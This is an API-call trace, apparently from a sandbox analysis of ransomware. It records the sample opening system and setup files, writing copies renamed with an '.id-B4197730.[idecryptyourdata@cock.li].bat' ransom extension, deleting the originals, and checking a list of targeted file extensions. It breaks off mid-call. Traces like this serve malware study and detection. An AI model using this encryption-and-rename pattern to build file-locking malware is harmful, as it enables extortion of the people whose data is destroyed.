Wow64DisableWow64FsRedirection (in: OldValue=0x30cff50 | out: OldValue=0x30cff50*=0x0) returned 1 [0045.439] lstrlenW (lpString="kernel32.dll") returned 12 [0045.439] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e9d0 | out: hHeap=0x5d0000) returned 1 [0045.439] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0045.439] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ea20 | out: hHeap=0x5d0000) returned 1 [0045.439] Sleep (dwMilliseconds=0x64) [0045.634] Sleep (dwMilliseconds=0x64) [0045.802] lstrcmpiW (lpString1=".cmd", lpString2=".bat") returned 1 [0045.802] lstrlenW (lpString="PartnerSetupComplete.cmd") returned 24 [0045.802] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0045.953] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=577) returned 1 [0045.953] CloseHandle (hObject=0x2c8) returned 1 [0045.953] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd")) returned 0x20 [0045.953] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0045.953] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0045.953] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0045.953] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0045.953] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.347] GetLastError () returned 0x0 [0046.347] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x241, lpOverlapped=0x0) returned 1 [0046.360] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x250, lpOverlapped=0x0) returned 1 [0046.361] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0046.361] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x104, lpOverlapped=0x0) returned 1 [0046.361] SetEndOfFile (hFile=0x2d0) returned 1 [0046.362] CloseHandle (hObject=0x2d0) returned 1 [0046.362] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.362] SetEndOfFile (hFile=0x2c8) returned 1 [0046.363] CloseHandle (hObject=0x2c8) returned 1 [0046.363] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0046.363] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd")) returned 1 [0046.364] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.364] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.364] lstrlenW (lpString=".doc") returned 4 [0046.364] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0046.364] lstrlenW (lpString=".docx") returned 5 [0046.364] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0046.364] lstrlenW (lpString=".pdf") returned 4 [0046.364] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0046.364] lstrlenW (lpString=".xls") returned 4 [0046.364] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0046.364] lstrlenW (lpString=".xlsx") returned 5 [0046.364] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0046.364] lstrlenW (lpString=".ppt") returned 4 [0046.364] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0046.364] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.364] lstrlenW (lpString=".zip") returned 4 [0046.364] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0046.364] lstrlenW (lpString=".rar") returned 4 [0046.364] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0046.364] lstrlenW (lpString=".bz2") returned 4 [0046.364] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0046.364] lstrlenW (lpString=".7z") returned 3 [0046.364] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0046.364] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.364] lstrlenW (lpString=".dbf") returned 4 [0046.364] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0046.364] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.365] lstrlenW (lpString=".1cd") returned 4 [0046.365] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0046.365] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.365] lstrlenW (lpString=".jpg") returned 4 [0046.365] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0046.365] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.365] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.365] lstrlenW (lpString=".doc") returned 4 [0046.365] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0046.365] lstrlenW (lpString=".docx") returned 5 [0046.365] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0046.365] lstrlenW (lpString=".pdf") returned 4 [0046.365] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0046.365] lstrlenW (lpString=".xls") returned 4 [0046.365] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0046.365] lstrlenW (lpString=".xlsx") returned 5 [0046.365] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0046.365] lstrlenW (lpString=".ppt") returned 4 [0046.365] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0046.365] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.365] lstrlenW (lpString=".zip") returned 4 [0046.365] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0046.365] lstrlenW (lpString=".rar") returned 4 [0046.365] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0046.365] lstrlenW (lpString=".bz2") returned 4 [0046.365] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0046.365] lstrlenW (lpString=".7z") returned 3 [0046.365] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0046.365] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.365] lstrlenW (lpString=".dbf") returned 4 [0046.365] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0046.366] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.366] lstrlenW (lpString=".1cd") returned 4 [0046.366] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0046.366] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 46 [0046.366] lstrlenW (lpString=".jpg") returned 4 [0046.366] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0046.366] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.366] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.366] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.385] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=14168) returned 1 [0046.385] CloseHandle (hObject=0x2c8) returned 1 [0046.385] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll")) returned 0x80 [0046.385] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.385] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0046.435] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.435] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.435] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.452] GetLastError () returned 0x0 [0046.452] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x3758, lpOverlapped=0x0) returned 1 [0046.462] WriteFile (in: hFile=0x2d8, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x3760, lpOverlapped=0x0) returned 1 [0046.463] ReadFile (in: hFile=0x2c8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0046.463] WriteFile (in: hFile=0x2d8, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.463] SetEndOfFile (hFile=0x2d8) returned 1 [0046.463] CloseHandle (hObject=0x2d8) returned 1 [0046.465] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.465] SetEndOfFile (hFile=0x2c8) returned 1 [0046.467] CloseHandle (hObject=0x2c8) returned 1 [0046.467] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.467] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll")) returned 1 [0046.467] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.467] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.467] lstrlenW (lpString=".doc") returned 4 [0046.467] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.467] lstrlenW (lpString=".docx") returned 5 [0046.468] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.468] lstrlenW (lpString=".pdf") returned 4 [0046.468] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.468] lstrlenW (lpString=".xls") returned 4 [0046.468] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.468] lstrlenW (lpString=".xlsx") returned 5 [0046.468] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.468] lstrlenW (lpString=".ppt") returned 4 [0046.468] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.468] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.468] lstrlenW (lpString=".zip") returned 4 [0046.468] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.468] lstrlenW (lpString=".rar") returned 4 [0046.468] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.468] lstrlenW (lpString=".bz2") returned 4 [0046.468] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.468] lstrlenW (lpString=".7z") returned 3 [0046.468] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.468] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.468] lstrlenW (lpString=".dbf") returned 4 [0046.468] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.468] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.468] lstrlenW (lpString=".1cd") returned 4 [0046.468] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.468] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.468] lstrlenW (lpString=".jpg") returned 4 [0046.468] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.468] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.469] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.469] lstrlenW (lpString=".doc") returned 4 [0046.469] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.469] lstrlenW (lpString=".docx") returned 5 [0046.469] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.469] lstrlenW (lpString=".pdf") returned 4 [0046.469] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.469] lstrlenW (lpString=".xls") returned 4 [0046.469] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.469] lstrlenW (lpString=".xlsx") returned 5 [0046.469] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.469] lstrlenW (lpString=".ppt") returned 4 [0046.469] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.469] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.469] lstrlenW (lpString=".zip") returned 4 [0046.469] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.469] lstrlenW (lpString=".rar") returned 4 [0046.469] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.469] lstrlenW (lpString=".bz2") returned 4 [0046.469] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.469] lstrlenW (lpString=".7z") returned 3 [0046.469] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.469] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.469] lstrlenW (lpString=".dbf") returned 4 [0046.469] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.469] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.469] lstrlenW (lpString=".1cd") returned 4 [0046.469] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.469] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 45 [0046.469] lstrlenW (lpString=".jpg") returned 4 [0046.469] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.470] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.470] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.470] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.472] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=18264) returned 1 [0046.472] CloseHandle (hObject=0x2d8) returned 1 [0046.472] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll")) returned 0x80 [0046.472] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.473] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.473] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.473] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.473] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.480] GetLastError () returned 0x0 [0046.480] ReadFile (in: hFile=0x2d8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x4758, lpOverlapped=0x0) returned 1 [0046.870] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x4760, lpOverlapped=0x0) returned 1 [0046.871] ReadFile (in: hFile=0x2d8, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0046.872] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xf8, lpOverlapped=0x0) returned 1 [0046.872] SetEndOfFile (hFile=0x2d0) returned 1 [0046.872] CloseHandle (hObject=0x2d0) returned 1 [0046.875] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.875] SetEndOfFile (hFile=0x2d8) returned 1 [0046.876] CloseHandle (hObject=0x2d8) returned 1 [0046.876] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.876] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll")) returned 1 [0046.877] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.877] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.877] lstrlenW (lpString=".doc") returned 4 [0046.877] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.877] lstrlenW (lpString=".docx") returned 5 [0046.877] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.877] lstrlenW (lpString=".pdf") returned 4 [0046.877] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.877] lstrlenW (lpString=".xls") returned 4 [0046.877] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.877] lstrlenW (lpString=".xlsx") returned 5 [0046.877] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.877] lstrlenW (lpString=".ppt") returned 4 [0046.877] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.877] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.877] lstrlenW (lpString=".zip") returned 4 [0046.877] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.877] lstrlenW (lpString=".rar") returned 4 [0046.877] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.877] lstrlenW (lpString=".bz2") returned 4 [0046.877] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.877] lstrlenW (lpString=".7z") returned 3 [0046.877] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.877] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.877] lstrlenW (lpString=".dbf") returned 4 [0046.877] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.877] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.877] lstrlenW (lpString=".1cd") returned 4 [0046.877] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.877] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.878] lstrlenW (lpString=".jpg") returned 4 [0046.878] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.878] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.878] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.878] lstrlenW (lpString=".doc") returned 4 [0046.878] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.878] lstrlenW (lpString=".docx") returned 5 [0046.878] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0046.878] lstrlenW (lpString=".pdf") returned 4 [0046.878] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.878] lstrlenW (lpString=".xls") returned 4 [0046.878] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.878] lstrlenW (lpString=".xlsx") returned 5 [0046.878] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0046.878] lstrlenW (lpString=".ppt") returned 4 [0046.878] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.878] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.878] lstrlenW (lpString=".zip") returned 4 [0046.878] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.878] lstrlenW (lpString=".rar") returned 4 [0046.878] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.878] lstrlenW (lpString=".bz2") returned 4 [0046.878] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.878] lstrlenW (lpString=".7z") returned 3 [0046.878] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.878] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.878] lstrlenW (lpString=".dbf") returned 4 [0046.878] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.879] lstrlenW (lpString=".1cd") returned 4 [0046.879] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.879] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0046.879] lstrlenW (lpString=".jpg") returned 4 [0046.879] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.879] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0046.879] lstrlenW (lpString="SetupResources.dll") returned 18 [0046.879] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.879] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=15704) returned 1 [0046.879] CloseHandle (hObject=0x2d8) returned 1 [0046.879] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll")) returned 0x80 [0046.880] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.880] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1041\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.880] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.880] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.880] CreateFileW 